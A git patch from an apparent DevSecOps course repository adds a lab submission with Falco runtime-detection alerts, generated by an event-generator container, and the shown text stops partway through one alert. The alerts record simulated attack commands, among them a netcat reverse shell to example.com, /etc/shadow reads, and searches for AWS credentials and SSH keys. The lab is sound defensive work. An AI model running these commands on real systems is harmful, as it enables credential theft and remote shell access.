From 52b936c68c3dfa56a1436e08ef8432647936f8d6 Mon Sep 17 00:00:00 2001
From: LegendIU <146006113+LegendIU@users.noreply.github.com>
Date: Mon, 9 Feb 2026 17:01:46 +0300
Subject: [PATCH 1/2] docs: add PR template

---
 .github/pull_request_template.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 .github/pull_request_template.md

diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 00000000..e69de29b

From 3b6b42083b1a2a75b6c63cb4204958f9683c3f08 Mon Sep 17 00:00:00 2001
From: LegendIU <146006113+LegendIU@users.noreply.github.com>
Date: Mon, 18 May 2026 13:13:59 +0300
Subject: [PATCH 2/2] docs: add lab9 falco runtime and conftest submission

---
 labs/lab9/analysis/conftest-compose.txt     | Bin 0 -> 142 bytes
 labs/lab9/analysis/conftest-hardened.txt    | Bin 0 -> 142 bytes
 labs/lab9/analysis/conftest-unhardened.txt  | Bin 0 -> 2718 bytes
 labs/lab9/analysis/falco-alerts-summary.txt |  22 ++
 labs/lab9/falco/logs/falco.log              | Bin 0 -> 76154 bytes
 labs/lab9/falco/rules/custom-rules.yaml     |   8 +
 labs/submission9.md                         | 222 ++++++++++++++++++++
 7 files changed, 252 insertions(+)
 create mode 100644 labs/lab9/analysis/conftest-compose.txt
 create mode 100644 labs/lab9/analysis/conftest-hardened.txt
 create mode 100644 labs/lab9/analysis/conftest-unhardened.txt
 create mode 100644 labs/lab9/analysis/falco-alerts-summary.txt
 create mode 100644 labs/lab9/falco/logs/falco.log
 create mode 100644 labs/lab9/falco/rules/custom-rules.yaml
 create mode 100644 labs/submission9.md

diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 0000000000000000000000000000000000000000..39a0485a90f51da35df93d504fec256eb858b1eb
GIT binary patch
literal 142
zcmXYrF%E-33<Re};srE3fP#Q{4Hbe5Iw^q@M-*NkSYIe?$+PyZ&tFbPK~GD=n+F{w
zJC3LxsWkmrV9*?;Oo`S~zG52-UNzs_#-HMz7aytSWG==X2cvqBw`bK=Oxd-P?T-t}
C$`@<^

literal 0
HcmV?d00001

diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt
new file mode 100644
index 0000000000000000000000000000000000000000..0ba71814ae3bd4011a1f2bc4eea188b8a539fb55
GIT binary patch
literal 142
zcmXYrI|_h63`Acocmf*_U?F-OEAhvIpT$-5^y)+{GLV;KCifK+kx)@mFiCS#Hadbd
ykg5Bar&b>{X<ur4huF%DQw{&N@m}09vTJHi=3>0#q>*}gI~HAqH#=9d{qX?ECKqM^

literal 0
HcmV?d00001

diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt
new file mode 100644
index 0000000000000000000000000000000000000000..f28fd71719069818d2e4638ae91077849d22db41
GIT binary patch
literal 2718
zcmd^>%}&BV6ov2F#3yjmuonDbL)@{D#KfRs<HA)fMT>2zoucyc>UXBCM2rt$32Dll
zxpSxI{(pWP*}V<<Wp-y{o7vQaoU#tA&vRmhmA0~_#THq`I<wGnOKbt+Kpfb!jr@CQ
zYjz@b`uxl73E9%-taF~Z4QvCFS=wl?&kZ;$?Q3KcG;W&Rh<kI^A*jxm;61*iy`#t4
zamNZIMSI|HS~SuDSYofu-44lH&*TB*&<;G$t}-v-7-EguZhvt<!xIy{er4DH%<CD<
z#7g`g@w@ms9|xt6K1Za<`;t?H4nPZ{Wb5~R;+|oh4C|C+*1lLk5%Ge@+ZwfR5%8OT
z_o84;W>>xk#Qq(U^C@xu<}1Bwf5JMZLd157Y(z~=c`9&qmJ7}<Jf{BBjm+4!N!tl-
z;G2^FGnlWiz@)K_1Cte1A!Lt=Dxs|Dsx>r~jA1<W5ztzrYs?h|s(hM=)G4=_p(!lD
z({&!y)lps#$rAber{9N6g4%7X=rOBvj}@Fy2bR7X4ahr9dzuZ^m7T{&oKTJ_6E)vS
WljNm0ws+sH3vQ@0(tXb%`i?JkwAc**

literal 0
HcmV?d00001

diff --git a/labs/lab9/analysis/falco-alerts-summary.txt b/labs/lab9/analysis/falco-alerts-summary.txt
new file mode 100644
index 00000000..7cf3c636
--- /dev/null
+++ b/labs/lab9/analysis/falco-alerts-summary.txt
@@ -0,0 +1,22 @@
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:35:{"hostname":"55e256ca65a4","output":"2026-05-18T10:05:06.246914546+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=<NA> command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098706246914546,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":null,"proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2026-05-18T10:05:06.246914546Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:55:{"hostname":"55e256ca65a4","output":"2026-05-18T10:05:06.384831254+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/drift.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1779098706384831254,"fd.name":"/usr/local/bin/drift.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-18T10:05:06.384831254Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:56:{"hostname":"55e256ca65a4","output":"2026-05-18T10:05:06.899152300+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1779098706899152300,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-18T10:05:06.899152300Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:58:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:16.496031027+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:51146->104.20.23.154:443 lport=443 rport=51146 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098776496031027,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:51146->104.20.23.154:443","fd.rport":51146,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2026-05-18T10:06:16.496031027Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:59:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.042281905+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=<NA> ggparent=<NA> gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098779042281905,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":null,"proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:19.042281905Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:60:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.143622338+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/usr/bin/find parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098779143622338,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/usr/bin/find","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-18T10:06:19.143622338Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:61:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.249241238+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/usr/bin/ln parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1779098779249241238,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link","proc.exepath":"/usr/bin/ln","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:19.249241238Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:62:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:25.386641120+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=<NA> gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/usr/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098785386641120,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/usr/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:25.386641120Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:63:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:25.491751267+0000: Warning Bulk data has been removed from disk | file=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/usr/bin/shred parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-347364980 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098785491751267,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-347364980","proc.exepath":"/usr/bin/shred","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2026-05-18T10:06:25.491751267Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:64:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.063678586+0000: Notice Packet socket was created in a container | socket_info=fd=7(<o>) domain=17(AF_PACKET) type=3 proto=3 connection= lport=<NA> rport=<NA> fd_type=<NA> fd_proto=<NA> evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=7(<o>) domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1779098786063678586,"evt.type":"socket","fd.l4proto":"<NA>","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"<NA>","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2026-05-18T10:06:26.063678586Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:65:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.178106980+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=<NA> ggparent=<NA> gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098786178106980,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":null,"proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:26.178106980Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:66:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.410854429+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-132851378/httpd parent_exepath=/usr/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=<NA> aname[5]=<NA> aname[6]=<NA> aname[7]=<NA> evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786410854429,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-132851378/httpd","proc.pexepath":"/usr/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2026-05-18T10:06:26.410854429Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:67:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.630400557+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786630400557,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-18T10:06:26.630400557Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:68:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.733723085+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/usr/bin/find parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786733723085,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/usr/bin/find","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-18T10:06:26.733723085Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:69:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.008250571+0000: Critical Fileless execution via memfd_create | container_start_ts=1779098775142151461 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=4 proc_exepath=memfd:program parent=event-generator command=4 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1779098775142151461,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1779098787008250571,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"4 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"4","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-18T10:06:27.008250571Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:70:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.275454053+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-1244904050/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787275454053,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-1244904050/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2026-05-18T10:06:27.275454053Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:71:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.380891865+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id 3e5c6576f4b70af76465da54304dc19bc5083024e730bcc2cf0574d8c758452a -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787380891865,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id 3e5c6576f4b70af76465da54304dc19bc5083024e730bcc2cf0574d8c758452a -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-18T10:06:27.380891865Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:72:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.597800392+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc.openbsd parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098787597800392,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc.openbsd","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2026-05-18T10:06:27.597800392Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:73:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.706351106+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/usr/bin/ln parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1779098787706351106,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow 